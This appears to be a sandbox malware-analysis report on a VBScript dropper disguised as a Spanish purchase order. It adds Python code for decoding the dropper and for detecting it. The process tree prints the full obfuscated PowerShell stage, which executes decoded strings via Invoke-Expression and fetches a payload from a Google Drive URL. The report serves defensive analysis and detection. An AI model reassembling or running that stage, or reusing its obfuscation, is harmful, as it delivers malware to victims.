Windows Analysis Report
BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs

Overview

General Information

Sample name: BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs (the sandbox renamed the file on submission; the non-ASCII characters Ó and Í of the original name appear as the escapes #U00d3 and #U00cd in every path below)
Original sample name: BOLUDA CORPORACIÓN MARÍTIMA, S.L. PEDIDO 268e44.vbs
Analysis ID: 1540405
MD5: 7b8f65c95deba3838f09c3c5e8f06c0c
SHA1: 23f1d2f39788402c16ba1f5d6932eb4bef6df983
SHA256: da852e6aeab8c6422eecc57d741aae2a49abd26ee2d29185c0fa8f898f4bdf71
Tags: vbs, user-malwarelabnet

Detection

Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5848 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin 
';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCKulleuGruo.rdesmoiNrlsttaand,YF.reaP Suger UnenOUdkldTRu udoKompoc.rigsOgaruaLPleon s.mal=Chas Syste[Ful sNAf evEOvereTSubv..ShellSByrneeFiniccS,aftuTviv R tehuI HalvtIncavYK rosPMumblrGlot oDom,stf agmo,lloicBesvao Cry lSkdp,t eoxyUnmotpCleanEBambu]bus.e: Cong:Race,TOutflL S.atSSimpl1Eksot2Slvsn ');$Fordrvende=$Flyversjusser[0];$Filmatiserer=(Osmate11 'Raddl$QuillgOutsklPartioBolivbTenniaD vell konv:SubcrBForb oTaxeoN .lamA Tian=,tilnNTacitEPolarW ermi-KimmsONoe ebDodekjStatuERegarCpussytAdolp sko S ,manY TeatS bravT gramEOr.homEncep.RasteNKundeETeodot Bron. ipstWFhaarEOversbLetvgcMuldvlOvervI.rrinE coitN WivaTUdenl ');Semicalcareous ($Filmatiserer);Semicalcareous (Osmate11 ',loac$ Un oB uieto ercynenep aFeder. 
OocyHP.angeFralgaTak ld TaxieFoxharKildesNonre[ Retr$Po itLRackeiMtaalncoaptgCoenuv kateivokatsbaggrtPhooleUng irBolignPaatveDuplisSpgel]Syste=Knig.$ ProdfVallirSoutteUltramWhe ss SvejtBascui palel unpllComedi Forsn OvergBums sWindoeIsdanvAbbaynNaadle implnMosef ');$Flugtbilister=Osmate11 'sk le$ForurBDow sobra anevapoa Groe..nsinD.plysoDy,grwDe.obnBringl Hippo UphoaP oardsvanhF MonoiProctlbubalePa,dr(Ko if$Djve FChondoBillarForlgd Sty rknevlvRalleeUnhu nCoagudChriseHom.g, Khev$PreprC jorinon tsFemineDobbelLbeseuReengr Disse osmo1Mourn4Taels4Metat) Ef.e ';$Ciselure144=$Frstehaandsviden93;Semicalcareous (Osmate11 'Parfe$BilleGAkadeLUg deoNowhibSkod,AXmasbLAlkin:NonosFFe lbjple roBeedggEring3 Li h3Ruptu=Spand(QuadrTB.kegESfaersUnv ntFljls-mogssp HanhAPh.siTMarkeh bund Vask$ UdtrCMagtbiMonkfS nsaleSupe,lBac.sudo.jeROxyheeStudi1Gt el4 salg4Frok )Unpli ');while (!$Fjog33) {Semicalcareous (Osmate11 'Ndtvu$Dear.gOverelAcridocoo.obSmalfa A,myl Diss:Pu hfFFremmoRigorrRum,aeOm laiMatchgPneumn T tae PrverBillesSammehSyntaiP zazpAnl,s= skyg$ Clovt UdverCh rauSootpeDigox ') ;Semicalcareous $Flugtbilister;Semicalcareous (Osmate11 'BushgS StorTBijekaKoru,rUdsmutUnret- TrykSVarefLSumloE inteESnipePBrnds Celie4Faldg ');Semicalcareous (Osmate11 'Indga$QuadrgDampsLAdelaOJu.ulb Divea S,iblUnfl,:UlvanfCosigjC reboKapelgS,lgs3Conge3Indva=Aphid(S oppTDaaseECal.mSMethotGenne- Forcp FiscaMarmeTConfuH Betr U gra$Flo lcBloksiU,perS Ar eePladdLArecaUuk.lirS ottE F st1Mabes4Perg.4Stenv)M.ane ') ;Semicalcareous (Osmate11 ' Spek$ verrGBoderLCupstoSkjo,BSam ea lorcL Disk:AfsniNFlde ARegi,TU enli ColoOpun.tNMe acaEven LBjlkeSUnp aO.ngakC ,okliDobbeaWhin LSk alISubjeS Banit UnabE QuerRhustrnUt ttereaffSDoc e1Boiss8Intim5Diaph=Bravu$FigurG KremLBagueOFiremBcalmaADeposL H pn:SejrraOve,dnHugenNa herU MotoLGa,pllPodicAhypertIconveCharm+Ba,df+ Atte%Boe t$La abfUnwe.lCar.oy BigavUmbereBiblir KvarsInterj MhorUXylots rakSFootge,ahinRSnirk.noedvcPenlooGeninuCapriN obbotF dig ') 
;$Fordrvende=$Flyversjusser[$Nationalsocialisternes185];}$Cruellest=298454;$Gerri=31481;Semicalcareous (Osmate11 'Gagen$HyrekgAngi LT lefOunnotbFr dsAunpasLDiano:Dity P Vaera onogRVoldtAsipidLE.okiLTeleoEE srelBarraiB,jdsz FlydI Usvkntrig,gOverl P osp=Ins i atchg PipieSpo.vTOveri-LigniCW hluoKnotlNUnc utFadebELigulN UndiTTekni Jarvy$slapdCUnoveiEnligsKanoneFingelEvangUMonopRArc,eEKola 1T avs4pro.r4kefti ');Semicalcareous (Osmate11 'Haren$ResidgStaggl ,humoRedifb StitaStbollSporo:Uld,aM rredeEmetosFla,so Ub,sc ForfeSysilpDistihLeukoaSp inlNem.ri .ewrsKla smForla Highb=Uny,l Nonpe[AnkomSLiq eyRegios EstetForaneAquatmmikro.stukkCun,nvo metrnOptllvCubaseMa,kerFortit Pala] orta:S egr:BatfiFV ljerBedstoSkorzmstyr.B KuanaVe kos U iveenean6Hulki4UrimeSPagintcinchrIndhoiAg flnSesamgPty l(E top$ Abo.PAlebeaSnebrrIsoniaAmbullNar olEn eleInradlGaaseiByronzUnvoli LibonNew pgOutri) ksp ');Semicalcareous (Osmate11 'Tonef$TribugFuldslG neroInterB RavnAParliLRette:El ctsLovbrk LukkaIndusAUnpron Eft SNusseeSkoleLIns.rs optrLTurb,S palaePsiloRinforeSeaf Allo =Nonc, Numme[BespasOutthyChippsGearvtTi sye Sta mAntip.Eddist BetjEAfstixTintotSharr. Outne bolinHilahcD,magO ealiDHurinIMarg.NSparkgBndel]mercu: Ch o:SayabAJuvenSRumfrcTysklIG ltyITendi.FairegFusleESamdrtS nkrsRygeatUlykkrFlyveI Anc N AlthGSwing(Sel.r$ha inMBethleOvermS O phoMikroc PassE VernPRecocH SeraaInnatl Ter,IPlatySultr mSting) Bl,t ');Semicalcareous (Osmate11 'Adeno$VandbgEhre LAffotoGidsebLykkeaP esslBagag:NulleaR.empn BaneTfogedESuperGCelluN pponi Dri NAchaeg.iploe LyncR.erraNPresteUnpo =Purdu$ rawls C leK rammADissea.evolNIndhySDetacEO.istlRekruSSnoreLloddesSempleHandsRS,jdmE Eyne.CanthsVvni u Famib I prsDagblTFolioR yllaISttedn Fol G rgot(stu i$ExtraCCheerRP omiU Li aeU,memLU.vejl OrthE TimeS ensiTTeg,e, Yuck$ForkoG eserESkattrGa.anR NundIMoe,t)Butto ');Semicalcareous $Antegningerne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
No configs have been found
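
The powershell.exe command line in the process tree above defines Osmate11 as the string decoder and Semicalcareous as a dot-sourced call through a variable, `. ($Duplicidentata) ($text)`, where $Duplicidentata decodes to ieX (Invoke-Expression), so every decoded literal is executed as code. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox: it reimplements the decoder, pulls every Osmate11 literal out of a fragment of the printed command line, and shows the host-check quirk (the `- 1` on the length is only applied while `$host.UI` is non-null). The encode_stuffed helper and its filler alphabet are assumptions of mine used to build test input; the URL used in the round trip is the one recorded in the Networking section.

```python
"""Decoder for the character-stuffing scheme used by the sample's Osmate11 function.

Added example written for this report; it is not code from the sample or from
Joe Sandbox. Osmate11 (see the powershell.exe command line in the process tree)
loops i = 5, 11, 17, ... while i < Length - 1 and keeps $s[i]; the other five
characters of every block are filler, and the trailing space is a pad that the
"- 1" skips. The "- 1" only applies when $host.UI is non-null, which it is in
any ordinary powershell.exe, so the decoder treats that as the default.
"""
from __future__ import annotations
import re

STRIDE = 6   # one payload character per six input characters
OFFSET = 5   # the payload character sits last in each block

def decode_stuffed(literal: str, host_ui_present: bool = True) -> str:
    """Replicate Osmate11 on one single-quoted literal."""
    end = len(literal) - (1 if host_ui_present else 0)
    return "".join(literal[i] for i in range(OFFSET, end, STRIDE))

def encode_stuffed(payload: str, filler: str = "abcdefghijklmnopqrstuvwxyz") -> str:
    """Inverse transform, used here only to build constructed test input (assumption).

    Every payload character is preceded by five filler characters, and a final
    block of five filler characters plus a space reproduces the sample's trailing
    pad, so decode_stuffed() recovers the payload exactly.
    """
    blocks = []
    for i, ch in enumerate(payload):
        start = (i * 5) % len(filler)
        blocks.append((filler + filler)[start:start + 5] + ch)
    blocks.append((filler + filler)[:5] + " ")
    return "".join(blocks)

# Every `Osmate11 '<literal>'` call site in the script. The sample's literals
# contain no doubled single quotes, so a plain [^']* body is enough here.
CALL_RE = re.compile(r"Osmate11\s+'([^']*)'")

def decode_calls(script: str) -> list[str]:
    """Decode every Osmate11 literal in a script fragment, in order of appearance."""
    return [decode_stuffed(m.group(1)) for m in CALL_RE.finditer(script)]

# Fragment of the sample's own command line as printed in the process tree above.
# Only literals without doubled spaces are used: the rendered page collapsed runs
# of spaces inside some literals (the URL literal, for one), which shifts the
# six-character alignment and garbles their decoding.
SAMPLE_FRAGMENT = (
    "$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';"
    "$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';"
    "$sortsmusket=Osmate11 ',carp>Ligki ';"
    "$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';"
)

if __name__ == "__main__":
    for literal, decoded in zip(CALL_RE.findall(SAMPLE_FRAGMENT), decode_calls(SAMPLE_FRAGMENT)):
        print(f"{decoded!r:16} <- {literal!r}")
    # Constructed round trip of the download URL seen in the Networking section.
    url = "https://drive.google.com/uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy"
    print(decode_stuffed(encode_stuffed(url)) == url)
```

The four literals in the fragment decode to the start of the browser User-Agent value ("Mozilla/"), the header name ("USer-AGENT"), the redirection operator (">") and the alias that drives execution ("ieX"). To decode the rest of the stage, including the Google Drive URL and the WebClient calls, run decode_calls over the raw command line exported from the sandbox rather than over the rendered page, because the collapsed spaces break alignment for some literals. The `- 1` tied to $host.UI is a weak host check: in a host with no UI the pad character would be appended to every string, which would break the script in an analysis harness that emulates PowerShell without one.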
YARA matches in the process memory of powershell.exe (PID 432):
  JoeSecurity_PowershellDownloadAndExecute (author: Joe Security): Yara detected Powershell download and execute
  INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC (author: ditekSHen): Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Matched string $b2 "::FromBase64String(" at 0xb62e8, 0xb6325, 0xb6363, 0xb63a2, 0xb63e2, 0xb6423, 0xb6465, 0xb64a8, 0xb64ec, 0xb6531, 0xb6577, 0xb65be, 0xb6606, 0xb664f, 0xb6699, 0xb66e4, 0xb67ea, 0x27382f, 0x2738c3, 0x273969, 0x274305

YARA matches in amsi64_432.amsi.csv (the script content AMSI passed to the antimalware scanner from PID 432; AMSI sees script blocks as they are executed, so this includes the text produced by the decoding layer, not only the obfuscated command line):
  JoeSecurity_PowershellDownloadAndExecute (author: Joe Security): Yara detected Powershell download and execute
  INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC (author: ditekSHen): Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Matched strings: $b2 "::FromBase64String(" at 0x10276; $s1 "-join" at 0xd5d8; $s4 "+=" at 0x6d84, 0x6e46, 0xb06d, 0xd18a, 0xd474, 0xd5ba, 0xf972, 0xf9f2, 0xfab8, 0xfb38, 0xfd0e, 0xfd92; $e4 "Get-WmiObject" at 0xde10, "Get-Process" at 0xdfff, "Start-Process" at 0xe057

      System Summary

Sigma rule matches (process creation events):
  Rule author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community. Event: Command / CommandLine / ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"; Image / NewProcessName / OriginalFileName: C:\Windows\System32\wscript.exe; ProcessName: wscript.exe; ProcessId: 5848; ParentProcessId: 4084; ParentCommandLine and ParentImage: empty; CommandLine|base64offset|contains: <@
  Rule author: Michael Haag. Event: the same wscript.exe process creation (ProcessId 5848, ParentProcessId 4084, identical fields).
  Rule author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Event: the powershell.exe process creation (PID 432) with the obfuscated command line shown in full in the process tree above (the page truncates it at this point).
      No Suricata rule has matched


      AV Detection

Source: BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs; ReversingLabs: detection 31%
Source: submitted sample; Integrated Neural Analysis Model: matched with 92.0% probability
HTTPS traffic detected (TLS 1.2): 142.250.185.206:443 -> 192.168.2.8:49704
HTTPS traffic detected (TLS 1.2): 142.250.185.206:443 -> 192.168.2.8:49705
HTTPS traffic detected (TLS 1.2): 142.250.185.65:443 -> 192.168.2.8:49706
PDB path strings found in powershell.exe memory (all regions are 00000002.00000002.<id>.<address>.00000004.00000020.00020000.00000000.sdmp, abbreviated below as <id>/<address>). These are the standard .NET and PowerShell engine symbol references present in any powershell.exe process and say nothing about the sample itself:
  \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= (1679719190/000001E9B2511000)
  \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb (1678372336/000001E9B21D8000)
  mscorlib.pdb (1679719190/000001E9B24BF000)
  \??\C:\Windows\symbols\dll\mscorlib.pdb (1679517302/000001E9B2498000)
  mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 (1679719190/000001E9B24E1000)
  pdblib.pdbXt (1646651748/000001E9983A1000)
  em.Core.pdbP (1678372336/000001E9B21D8000)
  \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 (1678372336/000001E9B21D8000)
  CallSite.Targetore.pdb (1679719190/000001E9B2511000)
  \??\C:\Windows\symbols\dll\mscorlib.pdb#e (1679517302/000001E9B2498000)

      Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; child process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Networking

HTTP requests observed (the report lists the drive.google.com requests more than once):
  GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1; Host: drive.google.com; Connection: Keep-Alive; no User-Agent header
  GET /download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download HTTP/1.1; Host: drive.usercontent.google.com; Connection: Keep-Alive; no User-Agent header
  GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0; Host: drive.google.com; Connection: Keep-Alive
JA3 client fingerprint (Joe Sandbox View): 3b5074b1b5d032e5620f69f9f700ff0e
UDP traffic to 1.1.1.1 without a corresponding DNS query (seen twice)
DNS queries: drive.google.com, drive.usercontent.google.com
URL strings found in powershell.exe memory (all regions are 00000002.00000002.<id>.<address>.00000004.00000800.00020000.00000000.sdmp, abbreviated below as <id>/<address>; truncated strings are reproduced as the sandbox found them):
  http://drive.google.com (1646952712/000001E99BBD6000, 1646952712/000001E99BAAF000)
  http://drive.usercontent.google.com (1646952712/000001E99BAE8000, 1646952712/000001E99BF1C000)
  http://nuget.org/NuGet.exe (1675040030/000001E9A9D9E000, 1675040030/000001E9A9EE1000)
  http://pesterbdd.com/images/Pester.png (1646952712/000001E999F57000)
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (1646952712/000001E999D31000)
  http://www.apache.org/licenses/LICENSE-2.0.html (1646952712/000001E999F57000)
  https://aka.ms/pscore68 (1646952712/000001E999D31000)
  https://apis.google.com (1646952712/000001E99A1C8000, 000001E99BAAF000, 000001E99BAD0000, 000001E99A1CC000, 000001E99A1AF000, 000001E99BAD4000)
  https://contoso.com/ (1675040030/000001E9A9EE1000)
  https://contoso.com/Icon (1675040030/000001E9A9EE1000)
  https://contoso.com/License (1675040030/000001E9A9EE1000)
  https://drive.googPb (1646952712/000001E99BAAA000)
  https://drive.googPzm (1646952712/000001E99BBD6000)
  https://drive.google.com (1646952712/000001E99BBD6000, 000001E99A1DD000, 000001E999F57000, 000001E99B9FD000)
  https://drive.google.com/uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0DyP (1646952712/000001E999F57000)
  https://drive.usercontent.googhko (1646952712/000001E99BAD4000)
  https://drive.usercontent.google.com (1646952712/000001E99BF1C000, 000001E99BAD4000)
  https://drive.usercontent.google.com/download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download (1646952712/000001E99A1C4000, 000001E99BAE8000, 000001E99A2DC000, 000001E99BACC000, 000001E99A1CC000, 000001E99BF1C000, 000001E99BAD4000)
  https://drive.usercontent.google.comD=620 (1646952712/000001E99A1CC000)
  https://github.com/Pester/Pester (1646952712/000001E999F57000)
  https://go.micro (1646952712/000001E99B05F000)
  https://nuget.org/nuget.exe (1675040030/000001E9A9D9E000, 000001E9A9EE1000)
  https://ssl.gstatic.com, https://www.google-analytics.com;report-uri, https://www.google.com, https://www.googletagmanager.com, https://www.gstatic.com (each in 1646952712/000001E99A1C8000, 000001E99BAAF000, 000001E99BAD0000, 000001E99A1CC000, 000001E99A1AF000, 000001E99BAD4000)
Only the drive.google.com and drive.usercontent.google.com strings are attributable to the sample. The other Google hostnames most likely come from the Google Drive response itself (the ";report-uri" fragment is Content-Security-Policy header syntax), and the nuget.org, pesterbdd.com, contoso.com, aka.ms, apache.org and schemas.xmlsoap.org strings are stock PowerShell module and .NET metadata found in any powershell.exe process.
TLS traffic on client ports 49704, 49705 and 49706 to port 443 (both directions recorded)
HTTPS (TLS 1.2) sessions: 142.250.185.206:443 -> 192.168.2.8:49704; 142.250.185.206:443 -> 192.168.2.8:49705; 142.250.185.65:443 -> 192.168.2.8:49706
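
The Sigma process-creation matches above, the wscript.exe -> powershell.exe chain with its multi-kilobyte command line, and the HTTP requests listed with and without a User-Agent header are all detectable from event data alone. The Python below is an added example written for this report, not Joe Sandbox's code and not the matched Sigma rules reproduced verbatim: it approximates their conditions over constructed events modelled on the process tree and the requests above. The field names (Image, ParentImage, CommandLine), the list of user-writable paths and the 2048-character command-line threshold are assumptions chosen here; the powershell.exe command line in the events is a repeated fragment of the real one, standing in for its full length.

```python
"""Detection pass over process-creation and HTTP events for the chain in this
report: wscript.exe running a .vbs from the user's Desktop, wscript.exe spawning
powershell.exe with a multi-kilobyte command line, and HTTP requests sent without
a User-Agent header.

Added example written for this report; it is not Joe Sandbox's code and does not
reproduce the matched Sigma rules verbatim, only the conditions they rest on.
Assumptions: events carry Sysmon/Sigma style keys (Image, ParentImage,
CommandLine); the user-writable path list and the 2048-character command-line
threshold are chosen here, not values from the report or from Sigma.
"""
from __future__ import annotations
import re

SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")
POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh)\b", re.IGNORECASE)
USER_PATHS = ("\\users\\", "\\appdata\\", "\\temp\\")   # assumption: user-writable locations
LONG_CMDLINE = 2048                                    # assumption: chosen threshold

def process_alerts(ev: dict) -> list[str]:
    """Return the names of the signals a process-creation event triggers."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    hits = []
    # Script host executing a script file from a user-writable path (dropper pattern).
    if image.endswith(SCRIPT_HOSTS) and SCRIPT_EXT.search(cmd) \
            and any(p in cmd.lower() for p in USER_PATHS):
        hits.append("script_host_dropper")
    # Script host spawning PowerShell: the report's wscript.exe -> powershell.exe chain.
    if parent.endswith(SCRIPT_HOSTS) and image.endswith(POWERSHELL):
        hits.append("script_host_spawns_powershell")
    # A whole obfuscated stage passed inline produces an abnormally long command line.
    if len(cmd) > LONG_CMDLINE:
        hits.append("very_long_command_line")
    return hits

def parse_http_request(raw: str) -> dict:
    """Parse a raw HTTP/1.1 request head into method, target and lowercased header names."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}

def http_alerts(raw: str) -> list[str]:
    """Flag GET/POST requests that carry no User-Agent header at all."""
    req = parse_http_request(raw)
    if req["method"] in ("GET", "POST") and "user-agent" not in req["headers"]:
        return ["http_request_without_user_agent"]
    return []

# Constructed events modelled on the process tree above. The real powershell.exe
# command line is several kilobytes of obfuscated script; a repeated fragment of
# it stands in here so the length check has something realistic to measure.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ProcessId": 5848, "ParentProcessId": 4084,
     "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": "",
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"'},
    {"ProcessId": 432, "ParentProcessId": 5848,
     "Image": PS_EXE, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": f'"{PS_EXE}" " ' + "$x=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';" * 40 + '"'},
    {"ProcessId": 5388, "ParentProcessId": 432,
     "Image": r"C:\Windows\system32\conhost.exe", "ParentImage": PS_EXE,
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# The two request shapes listed in the Networking section, headers one per line.
HTTP_REQUESTS = [
    "GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1\n"
    "Host: drive.google.com\nConnection: Keep-Alive",
    "GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0\n"
    "Host: drive.google.com\nConnection: Keep-Alive",
]

def run_all() -> dict[str, list[str]]:
    """Evaluate every constructed event and request; keys identify the input."""
    results = {f"pid:{ev['ProcessId']}": process_alerts(ev) for ev in EVENTS}
    for n, raw in enumerate(HTTP_REQUESTS):
        results[f"http:{n}"] = http_alerts(raw)
    return results

if __name__ == "__main__":
    for key, hits in run_all().items():
        print(f"{key:10} {hits or '-'}")
```

The conhost.exe event produces nothing, which is the point of keying the chain rules on the parent image rather than on powershell.exe alone: powershell.exe started by explorer.exe or a scheduled task is routine, powershell.exe started by a script host with a command line this long is not. The User-Agent check is only useful for plaintext or TLS-inspected traffic; for the HTTPS sessions in this report the observable is the JA3 fingerprint and the Google Drive download URLs, which the header check cannot see.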

      System Summary

      barindex
Source: amsi64_432.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 432, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
